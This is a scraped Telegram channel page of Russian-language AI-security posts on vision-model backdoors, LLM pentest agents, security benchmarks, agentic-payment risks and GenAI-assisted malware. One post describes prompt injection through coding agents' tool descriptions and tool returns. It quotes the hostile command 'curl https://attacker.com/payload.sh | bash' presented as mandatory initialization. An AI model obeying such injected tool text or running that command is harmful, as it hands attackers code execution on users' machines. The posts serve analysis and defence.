Telegram Web
Ну и к слову. Bsides теперь будет в Пхеньяне

https://www.tgoop.com/aisecnews/6448

☺️☺️☺️

С интересным keynote спикером
🔥4👍1💯1🤗1
Как понимать бэкдоры в в CV?
🤖Представьте, что автопилот дрона чудом проходит все тесты, но в реальной эксплуатации начинает систематически уклоняться от грузов на складе — из-за едва заметного штриха в разметке пола, который в обучающем наборе случайно коррелировал с командой «обходить». 💁 Это не баг, а бэкдор - скрытое, детерминированное поведение, встроенное в модель и активируемое редким, незаметным триггером.

Статья ценна тем 🫰, что перестаёт топтаться по частностям и даёт рабочую таксономию угроз: стадия внедрения (данные, веса, инференс), тип триггера (патч, скрытый шум, семантика, трансформация), стратегия разметки (dirty vs clean-label), уровень представления (экземпляр, класс, нейрон, распределённо) и целевая задача (классификация, детекция, сегментация). Это позволяет чётко сопоставлять атаки и защиту — что защищает от чего и где остаются разрывы 🐻.

Ключевой месседж — асимметрия. 🫨 Атакующему достаточно одного эффективного вектора (чистые метки, input-aware триггеры, заражённый энкодер или один бит-флип в памяти), тогда как защита требует многоуровневой стратегии: очистка данных и спектральный анализ (Spectral Signatures, SPECTRE), устойчивое обучение (ABL и др.), аудит чекпоинтов (Neural Cleanse, ABS, Fine-Pruning) и runtime-детекция (STRIP, Februus). Но даже эти меры бессильны против адаптивных атакующих или sample-specific триггеров.
Белые пятна — supply chain атаки через предобученные энкодеры, аппаратные закладки, отсутствие кросс-таск бенчмарков и сертифицируемых методов защиты. Многие современные методы легко обходят классические фильтры, особенно при адаптивных атаках.

Что важно вынести 🍂
Доверять внешним датасетам и чекпоинтам опасно. Надёжная безопасность ML - это непрерывный аудит и слойная защита, а не одна волшебная патч-функция.
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍1🔥1💯1
Forwarded from OK ML
Где пентест-агенты работают, а где пока что нужен человек

Сегодня пентест-агенты умеют выполнять часть задач хакера, но не все. По данным Veracode, до 40% кода, написанного ИИ, содержит уязвимости - и это подталкивает индустрию к поиску автоматизированных решений для аудита. На этом фоне появляются пентест-агенты - системы, призванные автоматизировать процесс поиска уязвимостей. Правда, и сами они опираются на модели, которые порой генерируют небезопасный код. Упс 😁

Где помогают и где буксуют?

Один из простых и наглядных примеров - HackSynth. Агент работает по циклу планирование ➡️ выполнение ➡️анализ. Планировщик придумывает, что делать, а саммаризатор фильтрует шум из логов. Всё аккуратно, пошагово, но линейно.

Другой подход показала MAPTA. Тут есть Координатор, который строит общую стратегию и распределяет её между несколькими агентами, а агент-валидатор проверяет эксплойты - по сути как команда пентестеров с руководителем. Благодаря этому снижается количество false-positive, а риск того, что инфраструктура ляжет спать – минимален.
Результаты MAPTA:
100% успеха в SSRF и мисконфигурациях
83% - в broken authorization
0% - в blind SQL injection

НО! Симуляция ≠ реальная сеть. GAP Framework пробует метод Real-to-Sim-to-Real, чтобы сократить разрыв. LLM забывается на длинных сессиях, придумывает IP и требует строгой изоляции...
Чтобы снизить риски, применяют промпты с чёткой ролью, few-shot и chain-of-thought. Но даже так модели способны выдавать нерелевантные шаги и/или ошибочные команды.

Как агент думает

На практике агент работает довольно просто: он видит топологию сети, сервисы и учётки; может сканировать, эксплуатировать уязвимости, подбирать пароли и перемещаться по сети; получает бонус за успешные шаги и штраф за ошибки или обнаружение.
Чаще всего используют алгоритмы вроде PPO (Proximal Policy Optimization) и иерархические подходы: стратегический уровень решает, какую цель атаковать, тактический - как именно это сделать.

Для обучения создаются среды вроде PenGym, где подключаются реальные инструменты (Nmap, Metasploit). Эффективность проверяют на CTF-платформах или бенчмарках: PicoCTF, OverTheWire, XBOW. Низкая стоимость успешных атак (7 центов по данным MAPTA) показывает экономическую эффективность агентов в рутинных задачах, однако это не означает, что они подходят для всех сценариев.

Если по-простому
Агенты - это ускоритель пентеста, а не замена пентестеру. Они снимают рутину (сканы, переборы, типовые атаки), а человеку оставляют главное - анализ сложных уязвимостей.
Иначе говоря, пока агенты делают «скучное», человек остаётся в роли арбитра.
#ai #aiagent #pentest
1🔥41
В этом году ZeroNights вновь открывает приём заявок на доклады.

Конференция возвращается после трёхлетнего перерыва - и снова готова собрать на одной сцене сильные исследования, практичные инсайды и самое активное комьюнити.

В фокусе - Offensive и AppSec/SecOps, а также смежные направления. Если у тебя есть материалы по безопасности ИИ или GenAI - тоже будет интересно, мир уже вовсю сталкивается с новыми угрозами и атаками.

У тебя есть шанс поделиться опытом, показать своё исследование и просто отлично провести время. За эксклюзивы традиционно поощряют материально ;)

Подробности и подача заявок - на сайте конференции.
1🔥5🎄5331
CyberSOCEval: Benchmarking LLMs Capabilities for Malware Analysis and Threat Intelligence Reasoning
Deason et al., 2025
Статья, код

С большой помпой вышел давно обещанный CyberSOCEval – бенчмарк по оценке способностей моделей к выполнению defensive-задач кибербезопасности от Meta и Crowdstrike.

Бенчмарк состоит из двух частей, обе представляют собой синтетически сгенерированные наборы тестовых вопросов по артефактам. Первая задача состоит в динамическом анализе вредоносного ПО. Исследователи собирают датасет из неназванного числа вредоносных сэмплов разных категорий (вымогатели, инфостилеры, RAT и так далее), закидывают их в краудстрайковский сэндбокс (Hybrid Analysis) и получают отчеты в формате JSON. Затем с помощью Llama 3.2 90B на их основе генерируются тестовые в количестве 609 штук с множественным выбором, которые затем проверяются вручную. Вторая часть в целом аналогична, но вместо отчетов сэндбокса используются TI-отчеты, по которым для части вопросов из отчета извлекается граф связей типа [актор X -> использует -> вредоносное ПО Y -> атакует -> индустрию Z] – аж повеяло RDF – а потом строятся вопросы, для части – вопросы генерируются на базе заранее заданных категорий вопросов (сделай вопрос про то, куда действия маппятся в MITRE ATT&CK). Отчеты, правда, подаются интересным образом – PDF-файлы превращаются постранично в PNG-картинки. Всего через пайплайн генерации отчетов проходит 45 документов из разных источников – большинство от Crowdstrike, но есть и от АНБ. Получается 588 проверенных вручную вопросов, из которых небольшая часть вопросов, на которые нельзя ответить без анализа изображений, составлены вручную.

На этих задачах оцениваются передовые на момент исследования LLM, которые набирают 15-28% правильных ответов на задаче анализа ВПО и 43-53% на задаче анализа TI. В первой задаче на первом месте Claude-3.7-Sonnet, во второй – gpt-o3, на втором месте в обеих задачах llama-4-maverick, обгоняющая на всех задачах и gpt-4o, и gemini-2.5-pro. Даже малыш llama-4-scout отличился, обогнав на TI-задаче gpt-4o. Deepseek-R1 занял 4 место на анализе ВПО, а почитать TI ему почему-то не дали. Кроме этих цифр и наблюдения, что бенчмарк далек от насыщения, исследователи делятся следующими захватывающими фактами. Во-первых, если оставить в отчетах только важное, а неважное убрать, то качество почти не меняется (а иногда даже растет). Во-вторых, если дать LLM текст вместо сканов страниц, то качество растет сразу на 10 п.п 🤯., то же касается и их комбинации. Наконец, ответы на multiple-choice-вопросы не становятся сильно точнее, если добавить reasoning (вероятно, если бы у Meta был ризонер…🤔).

Если честно, от статьи очень смешанные впечатления. Во-первых, это немного забавная попытка предложить создателям моделей соревноваться, чья модель лучше парсит результаты работы CrowdStrike Falcon® Sandbox. Во-вторых, особенно в случае с TI, есть все же большая разница между практическим бенчмарком (те же бенчи на реверс функций) и выбором наиболее вероятного ответа на синтетический вопрос. В-третьих, модельки семейства Llama 4 хороши, но не уверен, что настолько, чтобы обходить Claude 3.7 Sonnet или gemini-2.5-pro на задачах анализа текста. Наконец, несколько удивляют мелкие детали типа все еще отсутствующего датасета логов сэндбокса (по SHA скачать без регистрации не вышло, поправьте, если неправ), неуказанное число сэмлов или непроверенный на одной из задач Deepseek-R1 в статье от 20+ именитых исследователей из многомиллиардных корпораций. Кроме того, хотя для TI это и очень непросто, было бы круто иметь датасет свободный от геополитических импликаций (без вопросов про СВР и иранских хакеров). Остается надеяться, что это не последняя версия, и следующая будет поинтереснее.
🔥52👎11
Почему LLM всё ещё генерируют уязвимый код. Результаты A.S.E Benchmark

В недавнем исследовании был представлен бенчмарк A.S.E (AI Code Generation Security Evaluation), который оценивает способность языковых моделей генерировать безопасный код в условиях, максимально приближённых к реальной разработке. В этом посте мы разберём: чем A.S.E отличается от предыдущих подходов, какие результаты он показал на ведущих моделях и почему они до сих пор уязвимы.

Главное отличие A.S.E в том, что проверка проводится на уровне целого репозитория, а не как это было раньше, на отдельных участках кода. Это позволяет учитывать архитектуру проекта, взаимосвязь файлов и внешние зависимости. Основой для бенчмарка стали реальные репозитории в GitHub с зафиксированными CVE и опубликованными патчами.

Чтобы избежать банального запоминания шаблонов небезопасного кода, разработчики бенчмарка добавили семантические и структурные мутации уязвимостей. Ещё одна важная деталь — автоматическая проверка с помощью правил статического анализа, которые отслеживают источник уязвимости, пути распространения данных и точку эксплуатации, что делает бенчмарк ближе к условиям, которые можно встретить при реальной разработке.
Результаты оказались показательными.

Среди 26 протестированных моделей ни одна не достигла уровня, который бы позволял назвать модель “Best FOR Security Generated CODE”. Лучший общий результат продемонстрировал Claude-3.7-Sonnet, однако его показатели по безопасности существенно отставали от качества кода. При этом наивысший балл именно по безопасности получила модель Qwen3-235B-A22B-Instruct, что указывает на сближение открытых и проприетарных решений в этой области. Самое впечатляющее — reasoning-режимы не помогали исправлять уязвимости, а делали код менее безопасным. Самой проблемной категорией уязвимостей оказался Path Traversal: почти все модели систематически ошибались при обработке путей и проверке доступа к файлам.

На мой взгляд, ценность A.S.E заключается именно в том, что он вскрывает технические слабости LLM, которые не видны на синтетических бенчмарках (хотя, к слову, их сейчас стало заметно меньше). Эти слабости отражают важную проблему: модели хорошо справляются с синтаксисом и общей структурой кода, но по-прежнему не способны достойно учитывать требования безопасности. Я думаю, что в течение года мы увидим заметный прогресс, но пока ситуация остаётся далёкой от уровня, который позволял бы доверять LLM генерацию кода без постоянной проверки.
57👍52🔥2👎1
🚀 Друзья, у меня важная новость.

Хорошие материалы требуют огромных затрат времени и сил. Поэтому я наконец-то завёл Boosty — и именно там будут выходить самые проработанные материалы/публикации/исследования - в которые вкладывается много энергии.

Но канал никуда не исчезает — здесь по-прежнему будут посты. Просто часть работ (особенно те, что требуют недель анализа) я буду выпускать в формате отчётов на эту платформу(не всегда конечно же, в канал также будет уходить много чего крутого).

К слову о том, что я уже для вас подготовил. Недавно мы вместе с OK ML подготовили первый в России комплексный отчёт по рынку AI Security - с актуальными данными на сентябрь 2025.

Что внутри отчёта:

➡️карта экосистемы игроков (стартапы, корпорации, госкомпании),

➡️ключевые драйверы роста и ограничения,

➡️разбор патентов и технологий,

➡️прогнозы развития до 2030 года,

Почему для вас это может быть важно?

AI Security в России только формируется, но уже видно: конкуренция растёт, давление регуляторов усиливается, а технологий становится всё больше. Этот отчёт помогает понять, где риски, а где новые возможности.

Цена - 50$. Мы однозначно считаем что материал такого стоит. Вот ссылка на Boosty

Буду стараться радовать вас такими «тяжеловесными» материалами чаще. Но поверьте, собрать, структурировать и оформить такое исследование гораздо сложнее, чем обычный пост.
Please open Telegram to view this post
VIEW IN TELEGRAM
2👎15🔥10👍6433🏆1
Как описание инструмента может стать болью для LLM-агента в курсоре

Когда вы пользуетесь Cursor или Claude Code, ИИ-агенты часто принимают содержимое компоненты Tool Invocation Prompt (или TIP) как доверенный источник. В нём объясняется, как пользоваться инструментом: приводятся схема параметров, примеры обращения к инструментам и правила безопасности (иногда). Если в TIP встроить лишние «системные требования» или «обязательную инициализацию», модель может воспринять их буквально и выполнить действия без внешней проверки.

Атакующий для реализации атаки использует классические приёмы промпт-инъекций в сочетании с социальной инженерией, адресованные модели: формирование важности («CRITICAL SYSTEM REQUIREMENT»), создание срочности («IMMEDIATE execution required»), маскировка под процесс «инициализации» при взаимодействии с инструментом.

Эти приёмы действуют в двух местах - при регистрации инструмента (Tool Description) и при возврате результата от инструмента (Tool Return). В первом случае вредоносный текст входит в интерфейс инструмента и становится частью внутренней «карты поведения» агента — его гайдлайна по использованию инструментов; во втором — злоумышленник прячет инструкции в ответах, и они выглядят как системные сообщения.

Исследование, проведённое учёными из Китая, описывает эксплуатацию в трёх шагах. Сначала злоумышленник через специально подготовленный инструмент получает от модели её системные промты и конфигурацию — это раскрывает, как устроен TIP и какие проверки существуют. Затем следует анализ уязвимостей структуры TIP: ищут форматы и процедуры, которые можно сломать или обойти. В конце концов — TIP hijacking, когда внедряются адаптированные инструкции и выполнение команды злоумышленника доводится до конца.

На практике выделяются три рабочих сценария. Первый — форматный DoS: TIP навязывает нестандартный, «сломанный» формат вывода (например, незакрытые XML/JSON), из-за чего парсер агента падает или зависает. Второй – RCE(Remote Code Execution)-1: прямая вставка команды в описание инструмента, например требование выполнить curl https://attacker.com/payload.sh | bash как «обязательную инициализацию». Третий - RCE-2: двухфазная координация описания и возврата инструмента, когда первый шаг «подготавливает» модель, а второй — инициирует локальное выполнение; этот сценарий эффективнее обходит защитного агента.

В репозитории TIPExploit продемонстрированы практические реализации: FastMCP-сервер и скрипты для DoS, RCE-1 и RCE-2 (malicious_server_rce1.py, malicious_server_rce2.py). Атака опирается на модульную структуру описаний и повторение «обязательных» шагов — это повышает вероятность, что основная модель проигнорирует предупреждения защитного агента. Эксперименты показали уязвимость реальных систем: IDE-агенты (Cursor), кодовые агенты (Claude Code) и CLI-агенты (Cline) - в ряде случаев защитный агент помечал команду как UNSAFE, но главная модель под воздействием заражённого TIP всё равно её выполняла.

Что делать на уровне архитектуры?


Исследователи рекомендуют снизить доверие к TIP и ввести некоторые барьеры. Первое — не позволять исполнение команд, описанных только в TIP, без цифровой верификации и явного подтверждения человека: TIP должен иметь подпись, а версии и хеши — проверяться перед применением. Второе — отделить парсинг и интерпретацию от режима исполнения: вывод инструментов сначала проходит анализ в «неисполняемом» режиме. Третье — усилить значимость защитный агент: он должен блокировать автоматический перевод текстовых утверждений в действия. Также, стоит ограничить форматы вывода, проверять схемы параметров и ставить лимиты на повторение «инициализаций».
3👍72🔥2🐳1👀1
Forwarded from Похек
⚡️ Claude Sonnet 4.5: долгожданный или всё же минорный апдейт?

Anthropic выпустил Claude Sonnet 4.5 — модель, претендующую на звание лучшей в мире для программирования (правда я думаю до Opus 4.1 пока далеко). Это качественный скачок в возможностях ИИ-агентов.

🔥Ключевые достижения

SWE-bench Verified — state-of-the-art результаты на бенчмарке реального программирования. Модель фокусируется на сложных задачах более 30 часов без потери контекста.

Computer Use — революционный прорыв. На OSWorld результат вырос с 42.2% до 61.4% за 4 месяца. Claude сертфит сайты, заполняет таблицы, выполняет сложные задачи в браузере.

‼️Практические результаты от клиентов Anthropic

- Hai Security: анализ уязвимостей быстрее на 44%, точность +25%
- Replit: ошибки снизились с 9% до 0% (в их внутренней разработке)
- Cognition: планирование +18%, общая производительность +12%

❗️Новые возможности

- Claude Code получил чекпоинты для сохранения прогресса, обновленный терминал и VS Code расширение.
- Claude API обзавелся инструментами контекстного редактирования и памяти для долгосрочных агентов. Цена: $3/$15 за миллион токенов.
- Claude Apps выполняет код и создает файлы (таблицы, презентации) прямо в диалоге.

⚙️Claude Agent SDK

Anthropic открыл инфраструктуру Claude Code. SDK решает управление памятью агентов, системы разрешений и координацию суб-агентов. Разработчики могут строить собственных агентов на той же основе.

🪲Безопасность

- Sonnet 4.5 — самая выровненная frontier-модель Anthropic. Снижены проблемные поведения: обман, подхалимство, стремление к власти. Улучшена защита от prompt injection.
- Работает под защитой ASL-3 с классификаторами CBRN. Ложные срабатывания снижены в 10 раз.

#️⃣Бонус: Imagine with Claude

Исследовательский превью — Claude генерирует софт на лету без предустановленного кода. Доступен Max-подписчикам на 5 дней: claude.ai/imagine.

💵Выводы

- Claude Sonnet 4.5 устанавливает новую планку для ИИ-ассистентов в программировании. Комбинация улучшенных возможностей кодинга, computer use и агентной архитектуры делает его серьезным конкурентом GPT-5 и даже внутренняя конкуренция с Opus 4.1.
- Доступен через API как claude-sonnet-4-5
- Уже доступен в Cursor IDE. Я лично жду его появление в Kiro IDE

🔗Источник

🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
3🥴7👎4🤔431👍1
Кто платит за тебя? Как ИИ-агенты меняют коммерцию — и почему это опасно.

Агентские платежи знаменуют новую эпоху: пользователи делегируют ИИ-агентам поиск, сравнение и оформление заказов — а протоколы должны обеспечивать не только передачу средств, но и верификацию намерения, подотчётность и интерпретируемость.

Традиционные платежи рассчитаны на прямое участие пользователя. Автономные агенты нарушают этот принцип — им нужны новые механизмы аутентификации, валидации и подотчетности. Недавно выпущенные решения (AP2, ACP - раскроем эти абревиатуры позже) строятся вокруг трёх ключевых элементов: авторизации, подлинности и подотчетности.

Как же работают агентские платежи?

Google предлагает AP2 — открытый протокол для агентских платежей, основанный на Verifiable Digital Credentials (VDCs). Эти криптографически защищённые удостоверения содержат мандаты трёх типов: на товар (Cart), намерение (Intent) и метод оплаты (Payment) — что обеспечивает неизменность цепочки согласий.

Однако не только Google работает в этом направлении. OpenAI и Stripe недавно выпустили Agentic Commerce Protocol(ACP) , ориентированный на быструю интеграцию с существующей инфраструктурой электронной коммерции. Уже реализованный в ChatGPT через функцию Instant Checkout, ACP использует Shared Payment Token , который выдается платежной системой после авторизации оплаты пользователем. Агент передает этот токен продавцу через API.

Mastercard Agent Pay фокусируется на корпоративной масштабируемости и контроле, используя принцип Know Your Agent (KYA), который ограничивает транзакции только зарегистрированными агентами. PayPal также поддерживает AP2, добавляя собственные слои безопасности, включая верификацию согласия через биометрию.

MCP также широко внедряется как унифицированный интерфейс для интеграции ИИ-агентов с внешними инструментами, включая платежные функции. MCP выступает в роли стандартизированного моста, который позволяет агентам подключаться к данным и инструментам через естественный язык и стандартизированные интерфейсы. Stripe, Adyen, Alipay и другие FinTech-провайдеры активно разрабатывают MCP-серверы для интеграции с агентами.

Несмотря на прогресс, агентские платежи уязвимы: Промпт-инъекция может изменить финансовые параметры; Agent Impersonation — имитировать поведение легитимных агентов; Confused Deputy — использовать доверие MCP-сервера для несанкционированных действий. Угрозы также могут возникнуть при пересечении протоколов и компрометации популярных MCP-серверов.

Ключевой пробел — отсутствие надёжной идентификации агентов. Хотя концепция Know-Your-Agent набирает популярность, остаются нерешёнными вопросы распределения ответственности, соответствия требованиям KYC (Know Your Customer), риск отмывания денег и защиты от эмерджентного поведения, которое может вызвать каскадные сбои.

Агентские платежи — неизбежная эволюция. Их успех зависит от стандартов, обеспечивающих автономность агентов при сохранении юридической подотчётности. Криптографические мандаты (например, AP2) и архитектура Zero Trust с Attribute-Based Access Control — ключевые элементы будущих систем.

Интеграция с блокчейном и использование стейблкоинов, поддерживаемых AP2 через партнерство с Coinbase, открывают путь к программируемым платежам, криптографической верификации и доступности без традиционной банковской инфраструктуры. Zero-Knowledge Proofs (ZKPs) представляют собой технологию, которая может стать основой доверительного обмена в агентской экономике, позволяя доказывать утверждения без раскрытия чувствительной информации.

Однако остаются важные вопросы: как регулировать автономные экономические субъекты? Как распределять ответственность за действия агентов? И, что особенно важно, готовы ли мы как общество к экономике, где решения принимаются автономными системами, а не людьми?
1014🔥2🐳2🍾1🎄1
С ИИ всё стало умным, в том числе и… малварь — история появления GenAI-полиморфных вирусов #опытэкспертов

GenAI сегодня становится не просто ассистентом для скрипткидди, но и элементом киллчейна, выполняя задачи по генерации вредоносного кода "на лету", уже внутри контролируемого контура — это полноценный новый вектор атаки.


За два года вокруг "расцензуренных" LLM вырос целый подпласт киберугроз. Но если WormGPT/FraudGPT это уже банальные подсказки для фишинга и помощник для скрипт-кидди, то куда интереснее случаи, где модель встраивается в сам цикл атаки и генерирует действия/код "на лету".

Борис Захир, независимый эксперт и автор блога "Борис_ь с ml", выделил в статье четыре интересных кейса, от PoC до боевого инцидента, и сделал вывод — GenAI уже не просто декорация, а значимый элемент киллчейна.

➡️ Читать статью на Хабре

В материале упоминаются и довольно известные инциденты — EchoLeak и Lethal Trifecta, приведены их схемы реализации. И на их фоне становится понятно, чем кардинально отличаются другие, уже менее популярные атаки — BlackMamba, PromptLock, s1ngularity. И рассмотрен также пример раздутой хайпом ситуации, на самом деле не имеющей пока серьезной значимости — это SkyNet.

Главное отличие EchoLeak от BlackMamba и прочих из этой тройки, которые эксперт предлагает называть GenAI-полиморфными вирусами — это не прямая реализация вредоносного действия с помощью тула агента, а использование GenAI для создания конкретных кусочков малвари: кода дискаверинга секретов, шифрования файлов, написание рансом-сообщения жертве.

В самой же статье вы найдете подробную схему реализации (с тактиками/техниками) каждого инцидента, ответы на вопросы об эффективности таких методов атаки и о том, почему же все-таки это работает и обходит защиту, а также взгляд эксперта на перспективы развития таких вирусов.

✏️ Статью написал Борис Захир, независимый эксперт и автор блога  "Борис_ь с ml"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍52🔥2💯1🦄1
2025/10/09 06:48:35
Back to Top
HTML Embed Code: